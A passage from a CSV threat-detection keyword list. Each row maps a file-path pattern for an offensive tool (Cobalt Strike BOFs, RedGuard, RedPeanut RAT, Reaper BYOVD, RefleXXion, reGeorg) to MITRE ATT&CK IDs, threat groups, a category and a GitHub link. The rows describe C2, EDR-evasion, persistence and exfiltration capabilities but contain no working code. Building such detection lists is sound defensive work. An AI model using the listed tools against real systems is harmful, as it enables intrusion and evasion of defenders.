FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","17","4","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" +"*/Readfile_BoF/*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","17","4","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" +"*/RealTimeSync.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*/realvnc-auth-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Reaper.git*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*/Reaper/Reaper.cpp*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*/ReaperX64.zip*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*/REC2.git*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*/recon-archy.git*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*/RecycledInjector*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*/RecycledInjector.git*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*/RedGuard.git*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/RedGuard.go*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/RedGuard_32","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/RedGuard_64","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/redirector/redirector.py*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*/redis-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/redis-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/redpeanut.cer*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*/RedPeanut.git*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*/RedPeanut.html*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*/RedPeanutAgent/*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*/RedPeanutRP/*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*/RedPersist.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*/RedPersist.git*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*/redsocks.sh*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*/redsocks-fw.sh*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*/RedTeam_toolkit*","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z" +"*/red-team-scripts*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*/RedWarden.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*/ReferenceSourceLibraries/Sharpire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/ReflectiveDll.c*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/ReflectiveDLLInjection/*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/ReflectiveLoader.c*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/ReflectiveNtdll.git*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*/RefleXXion.git*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" +"*/reGeorg.git*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" +"*/RegistryPersistence.c*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*/Registry-Recon/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","10","10","314","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z" +"*/reg-query.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/regreeper.jpg*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not 